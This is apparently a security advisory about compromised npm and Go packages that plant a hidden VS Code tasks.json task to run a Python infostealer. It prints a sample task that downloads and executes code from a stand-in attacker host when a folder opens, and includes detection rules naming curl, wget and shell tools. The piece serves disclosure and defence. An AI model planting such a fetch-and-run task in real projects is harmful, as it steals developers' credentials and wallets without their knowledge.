Threat actors have compromised legitimate npm and Go packages to deliver a sophisticated Python-based infostealer that exploits Visual Studio Code’s task automation system. The malware hijacks VS Code’s tasks.json configuration to execute malicious payloads silently when developers open infected projects. This supply chain attack targets developer credentials, cryptocurrency wallets, browser data, and source code, with the malicious code persisting through VS Code’s trusted workspace feature.
Introduction
The software development supply chain has become a prime target for sophisticated threat actors seeking to compromise thousands of systems through a single poisoned package. In a recent campaign, attackers successfully hijacked multiple npm and Go packages, embedding malicious code that weaponizes Visual Studio Code’s built-in task automation features to deploy a Python-based information stealer.
This attack represents an evolution in supply chain compromise techniques, moving beyond simple post-install scripts to leverage IDE-specific features that developers trust implicitly. By abusing VS Code’s tasks.json configuration files, the malware achieves execution in a context that typically bypasses security scrutiny, making detection significantly more challenging.
The affected packages have been downloaded thousands of times before detection, potentially compromising developer workstations across numerous organizations. This incident underscores the critical need for enhanced supply chain security measures and vigilance when incorporating third-party dependencies into development workflows.
Background & Context
Visual Studio Code’s task system allows developers to automate repetitive operations like building, testing, and deploying code. Tasks are defined in .vscode/tasks.json files within project directories and can be configured to run automatically when a workspace is opened. While this feature enhances productivity, it also creates an attack vector when malicious actors control the task configuration.
Supply chain attacks targeting developer tools have surged over the past two years, with npm and Go ecosystems experiencing numerous compromise incidents. Attackers typically employ typosquatting, dependency confusion, or account takeover to inject malicious code into packages that developers trust and integrate into their projects.
The combination of package manager compromise and IDE exploitation represents a sophisticated multi-stage attack that requires understanding of both software distribution mechanisms and developer workflows. This campaign demonstrates that threat actors are increasingly studying the specific tools and practices used by development teams to craft attacks that blend seamlessly into normal operations.
The Python infostealer payload itself follows established patterns seen in commodity malware, but its delivery mechanism through VS Code tasks marks a novel approach that significantly reduces the likelihood of detection during the initial infection phase.
Technical Breakdown
The attack chain begins when a developer installs a compromised npm or Go package containing hidden malicious code. During installation, the package creates or modifies the .vscode/tasks.json file in the project root directory with a malicious task configuration.
The injected task is structured to execute automatically using the “runOn” property set to “folderOpen”:
{
"version": "2.0.0",
"tasks": [
{
"label": "Install Dependencies",
"type": "shell",
"command": "python3",
"args": ["-c", "import urllib.request; exec(urllib.request.urlopen('https://malicious-domain.com/payload.txt').read())"],
"runOptions": {
"runOn": "folderOpen"
},
"presentation": {
"reveal": "never",
"panel": "shared"
}
}
]
}The task configuration includes several evasion techniques:
Silent Execution: The “reveal: never” presentation option prevents VS Code from displaying a terminal window, allowing the malicious code to run invisibly in the background.
Obfuscated Command: The Python one-liner downloads and executes a secondary payload directly in memory without writing files to disk, complicating forensic analysis.
Legitimate Appearance: The task label “Install Dependencies” mimics common development operations, reducing suspicion if a developer reviews the configuration.
The downloaded Python payload is a comprehensive infostealer targeting:
- Browser credentials and cookies (Chrome, Firefox, Edge, Brave)
- Cryptocurrency wallet files and browser extensions
- SSH private keys from
.sshdirectories - Git credentials and configuration files
- AWS, Azure, and GCP cloud provider credentials
- Environment variables containing API keys and tokens
- VS Code settings and extension data
- Clipboard contents and screenshots
The stealer exfiltrates data using multiple methods including HTTP POST requests to command-and-control infrastructure, Telegram bot APIs, and Discord webhooks, providing redundancy if one communication channel is blocked.
Persistence Mechanism: Beyond the initial execution, the malware modifies VS Code’s user settings (settings.json) to add the compromised workspace to the trusted workspaces list, ensuring tasks continue executing on subsequent opens without prompting the user for confirmation.
Impact & Risk Assessment
The impact of this attack extends far beyond individual developer workstations. Compromised credentials and API keys can provide attackers with:
Lateral Movement: Stolen SSH keys and cloud credentials enable attackers to access production environments, databases, and internal infrastructure that developers have permissions to access.
Source Code Theft: Git credentials and repository access allow exfiltration of proprietary code, intellectual property, and embedded secrets within codebases.
Financial Loss: Cryptocurrency wallet compromise results in immediate monetary theft, while stolen payment information can be sold or exploited.
Supply Chain Propagation: With access to developer accounts on package registries and repositories, attackers can inject malicious code into additional packages, exponentially expanding the compromise.
Reputation Damage: Organizations whose developers are compromised may face customer trust issues, regulatory penalties, and competitive disadvantages if breaches become public.
The risk is particularly acute because developers typically operate with elevated privileges and have access to sensitive systems that are isolated from general employee access. A single compromised developer workstation can serve as a beachhead for extensive network infiltration.
Organizations using the affected packages face immediate risk, but the broader developer community must also recognize that this technique can be replicated across any IDE with similar automation features, including JetBrains products, Eclipse, and others.
Vendor Response
Microsoft, as the maintainer of Visual Studio Code, has been notified of this attack technique. While VS Code’s task automation features are functioning as designed, Microsoft has indicated they are exploring enhanced security controls for workspace trust and task execution.
Current VS Code versions do prompt users when opening untrusted workspaces for the first time, but the malware specifically targets the trust establishment process by manipulating settings after initial compromise.
The npm security team has removed the identified malicious packages from the registry and suspended associated accounts. Package names have been flagged to prevent future registration by other actors. The Go team has taken similar action within the Go module proxy system.
Both npm and Go maintainers have emphasized that package verification remains primarily the responsibility of consumers, though they continue to invest in automated malware detection systems and security scanning infrastructure.
GitHub, which hosts the majority of affected repositories, has issued security advisories for projects that included the compromised packages as dependencies. Dependabot alerts have been triggered for repositories using vulnerable versions.
Mitigations & Workarounds
Organizations and individual developers should implement the following mitigations immediately:
Audit Project Configurations: Examine all .vscode/tasks.json files in current projects for suspicious or unfamiliar task definitions:
find ~/projects -name "tasks.json" -exec grep -l "runOn.*folderOpen" {} \;Disable Automatic Task Execution: Modify VS Code settings to prevent automatic task execution on folder open:
{
"task.allowAutomaticTasks": "off"
}Review Package Dependencies: Audit package.json and go.mod files for unexpected dependencies or recently updated packages from unfamiliar publishers:
npm audit
go list -m -json all | jq -r '.Path'Implement Package Integrity Verification: Use lock files (package-lock.json, go.sum) and verify checksums before installation to detect tampering.
Restrict Workspace Trust: Be conservative with workspace trust settings and regularly review trusted workspace lists in VS Code settings.
Network Egress Filtering: Implement firewall rules blocking outbound connections from development tools to unknown domains.
Detection & Monitoring
Security teams should implement the following detection strategies:
File Integrity Monitoring: Monitor for creation or modification of .vscode/tasks.json files, particularly by package manager processes:
auditctl -w /.vscode/tasks.json -p wa -k vscode_tasksProcess Monitoring: Alert on Python or shell processes spawned by VS Code with network connectivity:
- rule: Suspicious VS Code Child Process
condition: proc.pname = "code" and proc.name in (python, python3, bash, sh, curl, wget) and fd.netNetwork Traffic Analysis: Monitor for unusual outbound connections from developer workstations to cloud storage services, paste sites, or Telegram/Discord APIs.
EDR Behavioral Detection: Configure endpoint detection platforms to flag memory-only execution patterns and credential access attempts by development tools.
Log Analysis: Examine VS Code extension logs and task execution logs for unexpected activity:
tail -f ~/.config/Code/logs//exthost/output | grep -i "running task"Best Practices
Development teams should adopt these security practices to reduce supply chain risk:
Dependency Vetting: Before adding dependencies, review package maintainer reputation, update frequency, download statistics, and GitHub repository activity. Be particularly cautious of packages with recent ownership changes.
Minimal Dependencies: Reduce attack surface by minimizing third-party dependencies and regularly auditing whether each package is still necessary.
Sandboxed Development: Use containerized or virtual machine environments for projects involving unfamiliar code, isolating potential compromises from the host system.
Credential Management: Store sensitive credentials in dedicated secret management solutions (HashiCorp Vault, AWS Secrets Manager) rather than configuration files or environment variables.
Multi-Factor Authentication: Enforce MFA on all developer accounts for package registries, cloud providers, and source control platforms to limit damage from credential theft.
Regular Security Training: Educate developers about supply chain risks and social engineering techniques used to compromise package ecosystems.
Automated Security Scanning: Integrate tools like Snyk, Socket, or Dependabot into CI/CD pipelines to identify malicious packages before they reach production environments.
Least Privilege: Limit developer access to production systems and sensitive data, implementing just-in-time access provisioning where possible.
Key Takeaways
- Threat actors are evolving supply chain attacks to exploit IDE-specific features like VS Code tasks, moving beyond traditional package manager hooks
- Automatic task execution on folder open provides a stealthy persistence mechanism that bypasses many security controls
- Python-based infostealers deployed through this technique can harvest credentials, cryptocurrency, and source code from developer workstations
- Organizations must audit project configurations, disable automatic task execution, and implement comprehensive dependency vetting processes
- Detection requires multi-layered monitoring including file integrity, process behavior, and network traffic analysis
- The incident demonstrates that developer tools themselves have become high-value targets requiring dedicated security controls
References
- Visual Studio Code Tasks Documentation: https://code.visualstudio.com/docs/editor/tasks
- npm Security Best Practices: https://docs.npmjs.com/security-best-practices
- Go Module Security: https://go.dev/blog/supply-chain
- MITRE ATT&CK T1195.001: Supply Chain Compromise – Compromise Software Dependencies and Development Tools
- OWASP Top 10 CI/CD Security Risks: https://owasp.org/www-project-top-10-ci-cd-security-risks/
Stay updated at https://cydhaal.com — Your Daily Dose of Cyber Intelligence.
📧 Subscribe to our newsletter at https://cydhaal.com/newsletter/